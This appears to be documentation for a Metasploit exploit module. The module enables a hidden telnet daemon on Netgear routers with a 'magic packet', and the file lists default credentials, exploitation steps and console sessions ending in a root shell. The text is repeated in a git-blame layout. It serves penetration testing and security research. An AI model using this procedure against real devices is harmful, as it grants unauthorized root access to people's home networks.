documentation/modules/exploit/linux/telnet/netgear_telnetenable.md

## Introduction

Several models of Netgear devices have a hidden telnet daemon that can be
enabled for remote LAN users by sending a 'magic packet' to the device. 
Upon successful connect, a root shell should be presented to the user.

There are many devices which contain this daemon, for a full list see [OpenWrt](https://wiki.openwrt.org/toh/netgear/telnet.console).

This module has been successfully tested against:

 - AC1450 - unknown older firmware (TCP)
 - AC1450 - latest firmware: V1.0.0.36_10.0.17 (UDP)
 - N300 WNR2000 v3 - firmware: V1.1.2.10 (TCP)

## Setup

A MAC address is required for exploitation.  To determine the MAC address of the device:

1. Ping the device to force an ARP lookup: ```ping -c 1 [IP]```
2. Get the MAC: ```arp -an [IP]```

If you are the root user, you can skip this step. ARP will be leveraged
to find the MAC address.

## Targets

**0 (Automatic)**

Detect if a device listens on TCP or UDP.

**1 (TCP)**

Older devices usually listen on TCP.

**2 (UDP)**

Newer devices usually listen on UDP.

## Options

**MAC**

Set this to the MAC address of the device. You can use `ping` and `arp`
to find it.

You can leave this blank if you're root.

**USERNAME**

If this is an older device, it'll take the value of `super_username` in
`nvram`, which is usually unchanged from `Gearguy`.

If this is a newer device, it'll take the web UI username, which is
usually unchanged from `admin`.

You can leave this blank to use the default username.

**PASSWORD**

If this is an older device, it'll take the value of `super_passwd` in
`nvram`, which is usually unchanged from `Geardog`.

If this is a newer device, it'll take the web UI password, which is
usually unchanged from `password`.

You can leave this blank to use the default password.

## Exploitation 

1. Make sure you have a vulnerable device
2. Start metasploit
3. ```use exploit/linux/telnet/netgear_telnetenable```
4. ```set rhost [IP]```
5. ```set mac [MAC Address]``` if not running as root
6. ```exploit```
7. Enjoy a root shell!

## Usage

### AC1450

As a normal user:

```
msf > use exploit/linux/telnet/netgear_telnetenable
msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
[*] exec: ping -c 1 192.168.1.1

PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=2.04 ms

--- 192.168.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 2.041/2.041/2.041/0.000 ms
msf exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
[*] exec: arp -an 192.168.1.1

? (192.168.1.1) at [redacted] [ether] on wlan0
msf exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
mac => [redacted]
msf exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[+] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.3:34833 -> 192.168.1.1:23) at 2018-03-02 19:26:25 -0600

id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
```

As root:

```
msf > use exploit/linux/telnet/netgear_telnetenable
msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
rmsf exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[*] 192.168.1.1:23 - Attempting to discover MAC address via ARP
[+] 192.168.1.1:23 - Found MAC address [redacted]
[+] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:37771 -> 192.168.1.1:23) at 2018-03-02 19:33:42 -0600

id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
```
Don't be lazy and spell out "introduction" in docs 2019-09-30 16:58:00 -05:00			`## Introduction`
Add module doc 2018-02-28 15:47:31 -06:00
updated docs 2018-03-01 20:18:14 -05:00			`Several models of Netgear devices have a hidden telnet daemon that can be`
updated docs 2018-03-01 20:16:14 -05:00			`enabled for remote LAN users by sending a 'magic packet' to the device.`
			`Upon successful connect, a root shell should be presented to the user.`

update docs 2018-03-02 21:00:41 -05:00			`There are many devices which contain this daemon, for a full list see [OpenWrt](https://wiki.openwrt.org/toh/netgear/telnet.console).`
updated docs 2018-03-01 20:16:14 -05:00
			`This module has been successfully tested against:`

update docs 2018-03-02 21:00:41 -05:00			`- AC1450 - unknown older firmware (TCP)`
			`- AC1450 - latest firmware: V1.0.0.36_10.0.17 (UDP)`
			`- N300 WNR2000 v3 - firmware: V1.1.2.10 (TCP)`
Add module doc 2018-02-28 15:47:31 -06:00
			`## Setup`

updated docs 2018-03-01 20:16:14 -05:00			`A MAC address is required for exploitation. To determine the MAC address of the device:`

			1. Ping the device to force an ARP lookup: ```ping -c 1 [IP]```
			2. Get the MAC: ```arp -an [IP]```

Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`If you are the root user, you can skip this step. ARP will be leveraged`
			`to find the MAC address.`

Update doc with real info 2018-03-02 04:39:17 -06:00			`## Targets`

Update doc for automatic targeting 2018-03-02 06:22:48 -06:00			`0 (Automatic)`

			`Detect if a device listens on TCP or UDP.`

			`1 (TCP)`
Update doc with real info 2018-03-02 04:39:17 -06:00
			`Older devices usually listen on TCP.`

Update doc for automatic targeting 2018-03-02 06:22:48 -06:00			`2 (UDP)`
Update doc with real info 2018-03-02 04:39:17 -06:00
			`Newer devices usually listen on UDP.`

			`## Options`

			`MAC`

			Set this to the MAC address of the device. You can use `ping` and `arp`
			`to find it.`

Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`You can leave this blank if you're root.`

Update doc with real info 2018-03-02 04:39:17 -06:00			`USERNAME`

			If this is an older device, it'll take the value of `super_username` in
Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`nvram`, which is usually unchanged from `Gearguy`.
Update doc with real info 2018-03-02 04:39:17 -06:00
			`If this is a newer device, it'll take the web UI username, which is`
			usually unchanged from `admin`.

Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`You can leave this blank to use the default username.`

Update doc with real info 2018-03-02 04:39:17 -06:00			`PASSWORD`

			If this is an older device, it'll take the value of `super_passwd` in
Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`nvram`, which is usually unchanged from `Geardog`.
Update doc with real info 2018-03-02 04:39:17 -06:00
			`If this is a newer device, it'll take the web UI password, which is`
			usually unchanged from `password`.

Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`You can leave this blank to use the default password.`

updated docs 2018-03-01 20:16:14 -05:00			`## Exploitation`

			`1. Make sure you have a vulnerable device`
			`2. Start metasploit`
			3. ```use exploit/linux/telnet/netgear_telnetenable```
			4. ```set rhost [IP]```
Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			5. ```set mac [MAC Address]``` if not running as root
updated docs 2018-03-01 20:16:14 -05:00			6. ```exploit```
			`7. Enjoy a root shell!`
Add module doc 2018-02-28 15:47:31 -06:00
			`## Usage`

update docs 2018-03-02 21:00:41 -05:00			`### AC1450`

Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`As a normal user:`

Add module doc 2018-02-28 15:47:31 -06:00			```
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf > use exploit/linux/telnet/netgear_telnetenable`
			`msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1`
Add module doc 2018-02-28 15:47:31 -06:00			`rhost => 192.168.1.1`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1`
Add module doc 2018-02-28 15:47:31 -06:00			`[*] exec: ping -c 1 192.168.1.1`

			`PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.`
Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=2.04 ms`
Add module doc 2018-02-28 15:47:31 -06:00
			`--- 192.168.1.1 ping statistics ---`
			`1 packets transmitted, 1 received, 0% packet loss, time 0ms`
Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`rtt min/avg/max/mdev = 2.041/2.041/2.041/0.000 ms`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1`
Add module doc 2018-02-28 15:47:31 -06:00			`[*] exec: arp -an 192.168.1.1`

			`? (192.168.1.1) at [redacted] [ether] on wlan0`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]`
Add module doc 2018-02-28 15:47:31 -06:00			`mac => [redacted]`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(linux/telnet/netgear_telnetenable) > run`
Add module doc 2018-02-28 15:47:31 -06:00
Update doc for automatic targeting 2018-03-02 06:22:48 -06:00			`[+] 192.168.1.1:23 - Detected telnetenabled on UDP`
Refactor code into new methods 2018-03-02 15:29:51 -06:00			`[+] 192.168.1.1:23 - Using creds admin:password`
Add module doc 2018-02-28 15:47:31 -06:00			`[*] 192.168.1.1:23 - Generating magic packet`
Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP`
Add module doc 2018-02-28 15:47:31 -06:00			`[*] 192.168.1.1:23 - Sending magic packet`
			`[*] 192.168.1.1:23 - Disconnecting from telnetenabled`
			`[*] 192.168.1.1:23 - Waiting for telnetd`
			`[*] 192.168.1.1:23 - Connecting to telnetd`
			`[*] Found shell.`
Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`[*] Command shell session 1 opened (192.168.1.3:34833 -> 192.168.1.1:23) at 2018-03-02 19:26:25 -0600`
Add module doc 2018-02-28 15:47:31 -06:00
			`id`
			`id`
			`uid=0 gid=0(root)`
			`# uname -a`
			`uname -a`
Update doc for automatic targeting 2018-03-02 06:22:48 -06:00			`Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown`
Add module doc 2018-02-28 15:47:31 -06:00			`#`
			```
Add note about directly connecting to telnetd 2018-03-02 07:24:17 -06:00
Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`As root:`
Add note about directly connecting to telnetd 2018-03-02 07:24:17 -06:00
			```
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf > use exploit/linux/telnet/netgear_telnetenable`
			`msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1`
Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`rhost => 192.168.1.1`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`rmsf exploit(linux/telnet/netgear_telnetenable) > run`
Add note about directly connecting to telnetd 2018-03-02 07:24:17 -06:00
Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`[+] 192.168.1.1:23 - Detected telnetenabled on UDP`
			`[*] 192.168.1.1:23 - Attempting to discover MAC address via ARP`
			`[+] 192.168.1.1:23 - Found MAC address [redacted]`
			`[+] 192.168.1.1:23 - Using creds admin:password`
			`[*] 192.168.1.1:23 - Generating magic packet`
			`[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP`
			`[*] 192.168.1.1:23 - Sending magic packet`
			`[*] 192.168.1.1:23 - Disconnecting from telnetenabled`
			`[*] 192.168.1.1:23 - Waiting for telnetd`
Add note about directly connecting to telnetd 2018-03-02 07:24:17 -06:00			`[*] 192.168.1.1:23 - Connecting to telnetd`
			`[*] Found shell.`
Update doc a final time to appease the @h00die god 2018-03-02 19:40:11 -06:00			`[*] Command shell session 1 opened (192.168.1.2:37771 -> 192.168.1.1:23) at 2018-03-02 19:33:42 -0600`

			`id`
			`id`
			`uid=0 gid=0(root)`
			`# uname -a`
			`uname -a`
			`Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown`
			`#`
Add note about directly connecting to telnetd 2018-03-02 07:24:17 -06:00			```